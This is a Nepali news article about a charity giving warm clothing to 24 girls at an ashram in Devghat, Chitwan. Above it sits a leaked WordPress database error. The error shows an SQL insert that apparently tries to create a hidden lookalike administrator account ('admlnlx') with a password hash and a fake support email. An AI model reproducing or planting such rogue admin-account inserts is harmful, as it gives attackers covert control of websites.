WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BiYTD/ATiVfPOr/jn8PvLdieKuA6KF.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-13 05:18:31', '', 'admlnlx', 'admlnlx')
चितवन, मंसिर २५–
राष्ट्रिय सुस्त मनःस्थिति कल्याण संस्था चितवन शाखाले आज (शनिबार) देवघाटस्थित राम जानकी बालिका आश्रममा रहेका २४ जना बालिकाहरुलाई न्यानो कपडा ट्रयाक सुट प्रदान गरेको छ ।
संस्थाको रजत महोत्सवको अवसरमा आश्रित बालबालिकाहरुलाई सो न्यानो कपडा वितरण गरेको हो ।
राष्ट्रिय सुस्त मनः स्थिति कल्याण संस्था नेपालका केन्द्रिय उपाध्यक्ष मुक्तिनाथ अधिकारीको प्रमुख आतिथ्यता तथा रजत महोत्सव मुलसमिति संयोजक एवंम संस्थाका चितवन शाखाका सभापति राजकुमार श्रेष्ठको अध्यक्षतामा न्यानो कपडा वितरण कार्यक्रम सम्पन्न भएको हो ।
कार्यक्रममा रजत महोत्सव मुलसमितिका सहसंयोजक इश्वरकुमार श्रेष्ठले उपस्थितहरूलाइ स्वागत गर्नुभएको थियो ।
कार्यक्रममा आश्रमकी अध्यक्ष साबित्री टण्डनले नेपाली समाजमा सडकमा प्रत्येक बालिकाहरूको भयाबह अवस्थाको चर्चा गर्दै बालिकाहरुलाई गरिएको सहयोगप्रति धन्यवाद दिनुभयो ।